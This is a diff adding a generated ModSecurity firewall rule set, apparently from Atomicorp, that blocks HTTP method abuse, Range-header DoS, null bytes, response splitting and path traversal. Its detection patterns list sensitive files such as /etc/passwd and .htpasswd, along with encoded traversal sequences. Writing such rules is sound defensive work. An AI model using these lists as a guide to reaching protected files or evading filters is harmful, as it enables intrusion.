+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+#SecAction "phase:1,t:none,pass,nolog,noauditlog,initcol:global=global,initcol:ip=%{remote_addr}"
+#
+
+
+
+
+#Block compressed encoding
+SecRule REQUEST_HEADERS:Content-Encoding "^Identity$" "capture,log,auditlog,phase:1,t:none,deny,status:501,msg:'Atomicorp.com WAF Rules: ModSecurity does not support content encodings and can not detect attacks using it, therefore it must be blocked.',id:'340362',rev:3,severity:'3',logdata:'%{TX.0}'"
+
+# Indicators list
+SecRemoteRulesFailAction Warn
+SecRemoteRules cH3qcelhFi https://updates.atomicorp.com/channels/rules/installers/indicators.conf
+
+#check methods
+SecRule REQUEST_METHOD "@pm TRACE TRACK CONNECT" "phase:1,id:'333793',t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:1,id:334358,t:none,pass,nolog,noauditlog,skipAfter:END_METHOD_CHECKS"
+
+# Rule 340002: deny TRACE method
+SecRule REQUEST_METHOD "@pm TRACE TRACK" "phase:1,deny,log,auditlog,status:403,t:none,id:340002,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: TRACE/TRACK method denied'"
+
+# Rule 340361: deny CONNECT method
+SecRule REQUEST_METHOD "CONNECT" "deny,status:403,log,auditlog,t:none,capture,phase:1,id:340361,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: CONNECT method denied',logdata:'%{TX.0}'"
+
+SecMarker END_METHOD_CHECKS
+
+#protocol violation
+SecRule REQUEST_METHOD "POST" "deny,status:403,log,auditlog,t:none,chain,rev:4,id:'390616',phase:2,msg:'Atomicorp.com WAF Rules: POST request must have a Content-Length header',severity:'4'"
+SecRule &REQUEST_HEADERS:Content-Length "@eq 0" "t:none,chain"
+SecRule &REQUEST_HEADERS:Transfer-Encoding "@eq 0" "t:none"
+
+# Check for the expect header w/ HTTP/1.1 protocol
+#
+SecRule REQUEST_HEADERS:Expect "100-continue" "deny,status:403,t:none,chain,phase:2,log,auditlog,msg:'Atomicorp.com WAF Rules: Expect Header Not Allowed for HTTP 1.0.  This is an HTTP 1.1 feature.',severity:'5',id:'390706',rev:1"
+SecRule REQUEST_PROTOCOL "@streq HTTP/1.0"
+
+# Rule 340012:
+#Proxy Protection with our added MATCHED_VAR enhancement
+SecRule REQUEST_URI_RAW "^\w+:/"  "chain,phase:2,t:none,t:lowercase,capture,deny,log,auditlog,msg:'Atomicorp.com WAF Rules: Unauthorized Proxy access attempt',severity:'2',id:'340012',rev:3,logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@rx ://%{SERVER_NAME}/"
+
+#Apache Range DOS attack protection rules
+SecRule REQUEST_HEADERS:Range "(\d+)\-(\d+)\," "chain,capture,phase:2,rev:2,log,auditlog,t:none,deny,status:403,msg:'Atomicorp.com WAF Rules: Range: Invalid Last Byte Value. This may be a DOS attack',logdata:'%{matched_var}',severity:'5',id:'353012'"
+        SecRule TX:2 "!@ge %{tx.1}"
+
+SecRule REQUEST_FILENAME "\.pdf$" "phase:2,id:334359,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_RANGE_DOS"
+SecRule REQUEST_HEADERS:Range "^bytes=(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\,(\d+)?\-(\d+)?\," "phase:2,log,auditlog,capture,rev:2,t:none,t:lowercase,deny,msg:'Atomicorp.com WAF Rules: Range: Too many fields, this may be a DOS attack',logdata:'%{matched_var}',severity:'5',id:'353013'"
+SecMarker END_RANGE_DOS
+
+
+#Webdav doesnt always include Content-Length
+SecRule REQUEST_METHOD "^(?:CHECKOUT|PUT)"  "phase:1,id:364359,pass,t:none,nolog,noauditlog,skipAfter:END_TYPE_CHECK_1"
+
+SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1"  "phase:1,id:364459,pass,t:none,nolog,noauditlog,skipAfter:END_TYPE_CHECK_1"
+
+#Request Body must define Content-Type per RFC, so application knows how to parse
+#Prevents impedence mismatch attacks
+SecRule &REQUEST_HEADERS:Content-Type "@eq 0" "log,auditlog,chain,phase:2,rev:8,t:none,deny,log,status:403,msg:'Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header',id:'392301',severity:'5',tag:'no_ar'"
+        SecRule REQUEST_HEADERS:Content-Length "!^0$" "t:none"
+
+SecMarker END_TYPE_CHECK_1
+
+# This one has limited utility as a fixed rule, this probably needs to be generated by the customer
+# Restrict the maximum number of arguments in a request
+SecRule &ARGS "@gt 4096"  "chain,phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: Too many arguments in request (max set to 4096, increase as necessary for your system)',id:'390707',severity:'4',rev:'9'"
+SecRule REQUEST_URI "!((?:^/(?:imaclean|massdelete)/)|^/cgi-bin/dada/mail\.cgi$|^/index\.php/mageworx/customoptions_options|^/za/|^/back-?office/|^/moderate\.php|^/backend/configdomains\.php|\.do$|^/admin[a-z0-9]+?/index\.php\?controller=adminmodules)"  "t:none,t:lowercase"
+
+SecRule &REQUEST_COOKIES_NAMES "@gt 1000" "phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: Too many cookies in request (max set to 1000, increase as necessary for your system)',id:'330707',severity:'4',rev:2"
+
+SecRule REQUEST_URI "set-cookie" "phase:2,t:none,t:urlDecodeUni,t:lowercase,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: Possible CSRF attack',id:'330708',severity:'4',rev:2"
+
+#
+#Blocks certain types of obfuscation attacks on WAF
+SecRule ARGS_NAMES "@validateByteRange 1-255" "deny,log,auditlog,status:403,phase:2,msg:'Atomicorp.com WAF Rules: Null Byte Attack Blocked (Null byte character in Argument Name)',rev:23,id:'390626',severity:'1'"
+
+Secrule REQUEST_FILENAME "(?:/ajax-tab\.php|^/eprocservice/supplierinboundservice)" "phase:2,id:344358,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_CHAR_CHECK"
+
+SecRule ARGS|ARGS_NAMES|!ARGS:/msg/|!ARGS:message|!ARGS:templatecode|!ARGS:/bps_customcode/|!ARGS:areas|!ARGS:/illegalusernames/|!ARGS:/pw/|!ARGS:/^jform/|!ARGS:/image/|!ARGS:resolution|!ARGS:post|!ARGS:depth|!ARGS:email|!ARGS:/comment/|!ARGS:mailbox|!ARGS:/description/|!ARGS:/txt/|!ARGS:/text/|!ARGS:body|!ARGS:/message/|!ARGS:/content/|!ARGS:/password/|!ARGS:FoxyData|!ARGS:sent_mail_folder "@validateByteRange 1-255" "pass,nolog,noauditlog,phase:2,rev:24,id:390617,t:none,t:urlDecodeUni,setvar:tx.invalidarg=1,setvar:tx.invalidarg2=%{matched_var_name}'"
+
+#Is this a known spammer?
+SecRule TX:INVALIDARG "@eq 1" "chain,t:none,log,auditlog,deny,status:403,phase:2,msg:'Atomicorp.com WAF Rules: Spammer attempting to defeat recapatcha',rev:1,id:'395614',severity:'2'"
+SecRule TX:INVALIDARG2 "ARGS:recaptcha_response_field"
+
+SecRule TX:INVALIDARG "@eq 1" "chain,deny,log,auditlog,status:403,phase:2,msg:'Atomicorp.com WAF Rules: Null Byte Attack Blocked (Invalid character in ARGS)',rev:23,id:'390614',severity:'2'"
+SecRule TX:INVALIDARG2 "!@rx recaptcha_response_field"
+
+SecMarker END_CHAR_CHECK
+
+#block nulls and invalid characters
+SecRule REQUEST_URI|REQUEST_HEADERS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!ARGS:templateCode|!ARGS:areas|!ARGS:/password/|!ARGS:FoxyData|!ARGS:sent_mail_folder "@validateByteRange 1-255" "deny,log,auditlog,status:403,phase:2,msg:'Atomicorp.com WAF Rules: Null Byte Attack Blocked (Invalid character in request or headers)',rev:10,id:'390613',severity:'2',t:none,t:urlDecodeUni"
+
+#Check for digits in content length header
+SecRule REQUEST_HEADERS:Content-Length "!^\d+$" "deny,log,auditlog,status:403,capture,phase:2,t:none,msg:'Atomicorp.com WAF Rules: Content-Length HTTP header is not numeric', severity:'2',rev:1,id:'390618',logdata:'%{TX.0}'"
+
+
+#Response splitting attacks
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|REQUEST_URI "(?:\bhttp\/(?:0\.9|1\.[01])|< ?(?:html|meta)\b)" "phase:2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,deny,log,auditlog,status:400,msg:'Atomicorp.com WAF Rules: Attack Blocked -  HTTP Response Splitting Attack',id:'390712',logdata:'%{TX.0}',severity:'1',rev:5"
+
+#SecMarker END_SPLIT_CHECKS
+
+###############FILE PROTECTION RULES####################
+#
+Secrule REQUEST_URI "^/eprocservice/supplierinboundservice" "phase:2,id:344359,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_FILE_PROTECTION_2"
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!ARGS:templatecode|!ARGS:area|!ARGS:php|!ARGS:/form_data/|!ARGS:/post/|!ARGS:/comment/|!ARGS:/desc/|!ARGS:/htaccess/|!ARGS:/subject/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/body/|!ARGS:/message/|!ARGS:data|!ARGS:/content/|!ARGS:/resolution/|!ARGS:/wp_autosave/ "@pmFromFile os_files.txt" "id:344360,rev:5,severity:2,phase:2,deny,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,msg:'Atomicorp.com WAF Rules: Unauthorized Operating System File Access Attempt',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'attack-lfi',log,auditlog"
+
+SecRule REQUEST_URI_RAW|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|REQUEST_FILENAME|!ARGS:templatecode|!ARGS:area|!ARGS:php|!ARGS:/form_data/ "@pm ../ ... ..\ /etc /proc /var/tmp /usr /opt /sbin /bin /dev /tmp /kern /root /boot /sys /windows /winnt inetpub localstart.asp boot.ini ~root ~ftp ~bin ~nobody ~named ~guest ~logs ~sshd ~admin ~mysql ~postgres ~oracle //////// env win.ini" "id:334399,rev:2,phase:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334361,t:none,pass,nolog,noauditlog,skipAfter:END_FILE_PROTECTION_1"
+
+#Legacy web servers or misconfigured webservers
+SecRule REQUEST_URI "/etc/passwd" "phase:1,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:cmdline,id:347009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Protected File access denied'"
+
+#Invalid recursion
+#.../...
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|XML:/* "\.\.\.%2F\.\.\.%2F"  	"deny,log,auditlog,status:403,t:none,capture,id:347017,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Invalid Generic Path Recursion denied in URI/ARGS',logdata:'%{TX.0},%{matched_var_name}'"
+
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|XML:/* "\.\.\./\.\.\."  	"deny,log,auditlog,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,capture,id:347016,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Invalid Generic Path Recursion denied in URI/ARGS',logdata:'%{TX.0},%{matched_var_name}'"
+
+#potentially malicious recursion
+#../../../../..
+SecRule REQUEST_URI|REQUEST_FILENAME|ARGS|!ARGS:/text/|!ARGS:/txt/|!ARGS:/body/|!ARGS:/message/|!ARGS:data|!ARGS:/content/|!ARGS:/resolution/|!ARGS:/post/|!ARGS:/comment/|!ARGS:/desc/|!ARGS:/subject/|!ARGS:/content/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/ "/?\.?\./\.\./\.\./\.\./\.\." "phase:2,deny,log,auditlog,status:403,chain,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdline,id:347008,rev:16,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious deep path recursion denied'"
+SecRule REQUEST_URI "!(?:/site-builder/|/node/(?:[0-9]+/(?:edit|add)|add/))"  "t:none,t:lowercase"
+
+SecRule REQUEST_URI_RAW|REQUEST_FILENAME|ARGS|!ARGS:/text/|!ARGS:/txt/|!ARGS:/body/|!ARGS:/message/|!ARGS:data|!ARGS:/content/|!ARGS:/resolution/|!ARGS:/post/|!ARGS:/comment/|!ARGS:/desc/|!ARGS:/subject/|!ARGS:/content/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/ "\.\.\\\.\.\\\.\." "phase:1,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,id:347019,rev:15,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious path recursion denied'"
+
+#potentially malicious recursion
+#../../../../..
+SecRule REQUEST_URI_RAW|REQUEST_FILENAME|ARGS|!ARGS:/text/|!ARGS:/txt/|!ARGS:/body/|!ARGS:/message/|!ARGS:data|!ARGS:/content/|!ARGS:/resolution/|!ARGS:/post/|!ARGS:/comment/|!ARGS:/desc/|!ARGS:/subject/|!ARGS:/content/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/ "/?\.?\./\.\./\.\./\.\./\.\." "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:cmdline,id:347028,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious deep path recursion denied (base64 encoded)'"
+SecRule REQUEST_URI "!(?:/site-builder/|/node/(?:[0-9]+/(?:edit|add)|add/))"  "t:none,t:lowercase"
+
+
+SecRule REQUEST_URI "(^/node/(?:[0-9]+/(?:edit|add)|add)/)"  "t:none,t:lowercase,phase:2,id:323714,pass,nolog,noauditlog,skipAfter:END_RULE_340008"
+# Rule 340008: generic bogus path sigs
+SecRule REQUEST_URI|REQUEST_FILENAME|REQUEST_HEADERS|ARGS|!ARGS:myDevEditControl_html|!ARGS:/^currentValue/|!ARGS:/message/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/summary/|!ARGS:resolution|!ARGS:prefix|!ARGS:/post/|!ARGS:/comment/|!ARGS:/description/|!ARGS:/subject/|!ARGS:/content/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/|!ARGS:/msg/|!ARGS:suffix "/\.{3,}/" "capture,phase:2,log,auditlog,deny,status:403,t:none,t:urlDecodeUni,t:removenulls,t:cmdline,multimatch,id:340008,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Bogus Path denied',logdata:'%{TX.0},%{matched_var_name}'"
+
+# Rule 340008: generic bogus path sigs
+SecRule REQUEST_URI|REQUEST_FILENAME|REQUEST_HEADERS|ARGS|!ARGS:myDevEditControl_html|!ARGS:/^currentValue/|!ARGS:/message/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/summary/|!ARGS:resolution|!ARGS:prefix|!ARGS:/post/|!ARGS:/comment/|!ARGS:/description/|!ARGS:/subject/|!ARGS:/content/|!ARGS:/keywords/|!ARGS:/note/|!ARGS:/title/|!ARGS:/msg/|!ARGS:suffix "/\.{3,}/" "capture,phase:2,log,auditlog,deny,status:403,t:none,t:urlDecodeUni,t:removenulls,t:cmdline,id:340218,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Bogus Path denied (base64 encoded)',logdata:'%{TX.0},%{matched_var_name}'"
+
+SecMarker END_RULE_340008
+
+# Rule 340142: Special account protection
+SecRule REQUEST_URI "~(?:root|ftp|bin|admin|nobody|shutdown|named|guest|logs|sshd|mysql|postgres|oracle|tortix|atomic|httpd?)/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:cmdLine,t:replaceNulls,t:normalisePath,id:340142,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Special account protection'"
+
+SecRule SERVER_PORT "^(?:30000|8443)$" "phase:2,id:323712,pass,t:none,nolog,noauditlog,skipAfter:END_ASL_3"
+
+SecRule REQUEST_URI "(?:|^/cpsess[0-9]+/scripts2?/|alt_mod_frameset.php|checkout_shipping.php|^/components/com_zoom/etc/|/admin\.swf\?nick=|/editor/filemanager/browser/default/browser\.html\?(type=image&)?Connector=\.\./\.\./connectors|/phpthumb\.php\?((?:w|h)=[0-9]+&)?((?:w|h)=[0-9]+&)?src=\.\./\.\./(?:uploads|images)|^/etc/[a-z0-9-_]+\.(css|html?|jpe?g|gif|png|te?xt)$|^/\?cx=|^/wizard/edit/html$|/mancgi/cronrun\?command|^/index\.php\?module=asl&event=|^/site/index\.php\?do=/admincp/setting/edit/|^/plesk/server/migration/|^/smb/web/)" "t:none,t:lowercase,phase:2,id:323716,pass,nolog,noauditlog,skipAfter:END_RULE_340009"
+# Rule 340009: generic recursion signatures
+SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:dictionaryPath|!ARGS:shell|!ARGS:/zip_path/|!ARGS:server_path|!ARGS:php|!ARGS:/^civicrm/|!ARGS:/imagemagick/|!ARGS:/^gvid_/|!ARGS:/app_path/|!ARGS:/script/|!ARGS:/bin_path/|!ARGS:/ffmpeg_path/|!ARGS:/exiftool_path/|!ARGS:/antiword/|!ARGS:/pdftotext/|!ARGS:/^SystemProperties/|!ARGS:/bin_path/|!ARGS:/IMConfig/|!ARGS:imagemagick_path|!ARGS:/referer/|!ARGS:/referrer/|!ARGS:response|!ARGS:data|!ARGS:cte_cmd|!ARGS:/setting/|!ARGS:MailPath|!ARGS:file_temporary_path|!ARGS:/workingDir/|!ARGS:containers.env.value|!ARGS:jpg_path|!ARGS:/^groups/|!ARGS:editor|!ARGS:article|!ARGS:/shell/|!ARGS:/content/|!ARGS:/tx_extensionmanager/|!ARGS:/aspell/|!ARGS:title|!ARGS:/sidebar/|!ARGS:/^p_process/|!ARGS:prefix|!ARGS:suffix|!ARGS:resolution|!ARGS:/^w2Pcfg/|!ARGS:returnto|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:name|!ARGS:/redirect/|!ARGS:/path_to_file_cmd/|!ARGS:timezone|!ARGS:ZM_EXTRA_DEBUG_LOG|!ARGS:/ZM_PATH/|!ARGS:/device/|!ARGS:/sendmail/|!ARGS:/txt/|!ARGS:/summary/|!ARGS:/text/|!ARGS:/^config/|!ARGS:/^dPcfg/|!ARGS:g2_prefix|!ARGS:g2_form[path]|!ARGS:/keyword/|!ARGS:field_id_29|!ARGS:/highlight/|!ARGS:/search/|!ARGS:/msg/|!ARGS:/comment/|!ARGS:/hilit/|!ARGS:/uri/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:product[media_gallery][images]|!ARGS:/subject/|!ARGS:/comment/|!ARGS:/data/|!ARGS:/txt/|!ARGS:csum|!ARGS:/post/|!ARGS:LiveURLSegment|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:/desc/|!ARGS:note_title|!ARGS:/^xjxargs/|!ARGS:backPath|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:/body/ "(?:(\.\.|^| )/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|tmp|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|(?:win|boot\.ini))" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:cmdLine,t:replaceNulls,capture,id:340009,rev:68,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS',logdata:'%{TX.0},%{matched_var_name}',multimatch,log,auditlog"
+SecMarker END_RULE_340009
+
+SecMarker END_FILE_PROTECTION_1
+
+SecRule REQUEST_URI "(?:/products/index\.php\?gallery=|connector=\.\./\.\./connectors|^/admin/(?:structure/views/|[a-z]+/(?:edit|add)|d/1/)|/phpthumb\.php\?((?:w|h)=[0-9]+&)?((?:w|h)=[0-9]+&)?src=\.\./.{0,32}(?:pics|uploads|images)|/site-(?:builder|content)/|/node/(?:[0-9]+/(?:edit|add)|add/)|^/typo3/sysext/rtehtmlarea/mod3/browse_links\.php\?@rtetsconfigparams|^/eprocservice/supplierinboundservice)" "t:none,t:lowercase,phase:2,id:323715,pass,nolog,noauditlog,skipAfter:END_RULE_340007"
+
+
+#Rule 340007: generic recursion signatures
+#ver 1
+#SecRule REQUEST_URI_RAW|ARGS|!ARGS:/background/|!ARGS:/osm_file_list_URa/L|!ARGS:editor|!ARGS:/^ultra_/|!ARGS:/form_data/|!ARGS:/srcFile/|!ARGS:/^curUrl/|!ARGS:elm1|!ARGS:/EditorZone/|!ARGS:file_private_path|!ARGS:code|!ARGS:/^resp/|!ARGS:rpath|!ARGS:backpath|!ARGS:data|!ARGS:/body/|!ARGS:editor1|!ARGS:/sidebar/|!ARGS:/template/|!ARGS:/desc/|!ARGS:resolution|!ARGS:/problem/|!ARGS:/solution/|!ARGS:/^style_options/|!ARGS:/CACHE_PATH/|!ARGS:connector|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/^fields/|!ARGS:tos|!ARGS:exito|!ARGS:/icon/|!ARGS:/logo/|!ARGS:Details|!ARGS:/fields_prev/|!ARGS:Lead|!ARGS:/editfile/|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?i)(?:\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\.){2}(?:\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\/))" "phase:2,deny,log,auditlog,status:403,t:none,capture,id:340007,rev:48,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0},%{matched_var_name}'"
+
+#probably too many FPs
+#SecRule REQUEST_URI_RAW|ARGS|!ARGS:/background/|!ARGS:/osm_file_list_URa/L|!ARGS:editor|!ARGS:/^ultra_/|!ARGS:/form_data/|!ARGS:/srcFile/|!ARGS:/^curUrl/|!ARGS:elm1|!ARGS:/EditorZone/|!ARGS:file_private_path|!ARGS:code|!ARGS:/^resp/|!ARGS:rpath|!ARGS:backpath|!ARGS:data|!ARGS:/body/|!ARGS:editor1|!ARGS:/sidebar/|!ARGS:/template/|!ARGS:/desc/|!ARGS:resolution|!ARGS:/problem/|!ARGS:/solution/|!ARGS:/^style_options/|!ARGS:/CACHE_PATH/|!ARGS:connector|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/^fields/|!ARGS:tos|!ARGS:exito|!ARGS:/icon/|!ARGS:/logo/|!ARGS:Details|!ARGS:/fields_prev/|!ARGS:Lead|!ARGS:/editfile/|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?i)(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8|e)0%80%ae|2(?:(?:5(?:c0%25a|2))?e|%45)|u(?:(?:002|ff0)e|2024)|%32(?:%(?:%6|4)5|E)|c0(?:%[256aef]e|\.))|\.(?:%0[01]|\?)?|\?\.?|0x2e){2}(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))" "phase:2,deny,log,auditlog,status:403,t:none,capture,id:340007,rev:48,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0},%{matched_var_name}'"
+#ver 2
+SecRule ARGS|!ARGS:/background/|!ARGS:/osm_file_list_URa/L|!ARGS:editor|!ARGS:/^ultra_/|!ARGS:/form_data/|!ARGS:/srcFile/|!ARGS:/^curUrl/|!ARGS:elm1|!ARGS:/EditorZone/|!ARGS:file_private_path|!ARGS:code|!ARGS:/^resp/|!ARGS:rpath|!ARGS:backpath|!ARGS:data|!ARGS:/body/|!ARGS:editor1|!ARGS:/sidebar/|!ARGS:/template/|!ARGS:/desc/|!ARGS:resolution|!ARGS:/problem/|!ARGS:/solution/|!ARGS:/^style_options/|!ARGS:/CACHE_PATH/|!ARGS:connector|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/^fields/|!ARGS:tos|!ARGS:exito|!ARGS:/icon/|!ARGS:/logo/|!ARGS:Details|!ARGS:/fields_prev/|!ARGS:Lead|!ARGS:/editfile/|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?i)(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8|e)0%80%ae|2(?:(?:5(?:c0%25a|2))?e|%45)|u(?:(?:002|ff0)e|2024)|%32(?:%(?:%6|4)5|E)|c0(?:%[256aef]e|\.))|\.(?:%0[01]|\?)?|\?\.?|0x2e){2}(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))" "phase:2,deny,log,auditlog,status:403,t:none,capture,id:340007,rev:48,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0},%{matched_var_name}'"
+
+SecMarker END_RULE_340007
+
+SecRule SERVER_PORT "@streq 30000" "phase:2,id:323710,pass,t:none,nolog,noauditlog,skipAfter:END_ASL_3"
+#Protected file upload protection
+SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!ARGS:templatecode|!ARGS:areas|!ARGS:title "@pm .www_acl .htpasswd web.config .htaccess boot.ini httpd.conf /etc/ .htgroup global.asa .wwwacl .history sh_history env" "phase:2,id:'333796',t:none,t:urlDecodeUni,t:htmlEntityDecode,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334362,t:none,pass,nolog,noauditlog,skipAfter:END_FILE_PROTECTION_2"
+
+SecRule REQUEST_URI "^(?:/cpsess[0-9]+/(?:scripts2?|json-api)/|^/file\?file=/etc/cccam\.cfg$|event=update_asl_config|^/etc/(?:js/|\?)|^/index\.php\?module=asl&event=|^/etc/img/)" "t:none,t:urlDecodeUni,t:lowercase,phase:2,id:323765,pass,nolog,noauditlog,skipAfter:END_RULE_390709"
+
